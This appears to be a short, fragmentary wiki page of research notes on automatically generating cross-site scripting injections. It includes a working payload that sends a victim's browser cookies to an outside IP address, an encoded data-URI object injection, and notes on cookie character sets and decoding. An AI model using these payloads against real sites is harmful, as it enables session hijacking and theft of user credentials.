-
Notifications
You must be signed in to change notification settings - Fork 1
Wil Koch edited this page May 25, 2015
·
17 revisions
- Need an automated way to determine the constraints
- The need to design a method which can specify (payload, constraints) then generate the xss injection
#Examples
Use JQuery AJAX get request to CORS configured server
<script src='http://goo.gl/8LXprn'></script><script>$.get('http://52.13.21.28', {cookies:document.cookie})</script>
The data element can be used to encode javascript or html however it can not get cookies. The hex here is encoded using %XX and also the percent needing to be encoded to %25 in the URL.
<object data="data:text/html;hex,%253c%2573%2563%2572%2569%2570%2574%253e%2561%253c%252f%2573%2563%2572%2569%2570%2574%253e"></object>
#Jquery
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
http://goo.gl/8LXprn
In python to URI decode
import urllib
urllib.unquote('').decode('utf8')
#Characters in cookies
###Include
0x21: !
0x23-2B: #$%&'()*+
0x2D-3A: -./0123456789:
0x3C-5B: <=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[
0x5D-7E: ]^_`abcdefghijklmnopqrstuvwxyz{|}~
###Exclude
US-ASCII characters excluding CTLs, whitespace, DQUOTE, comma, semicolon, and backslash
#Cookie Injection
##Base 64
##URI coding
eval(decodeURIComponent())
#References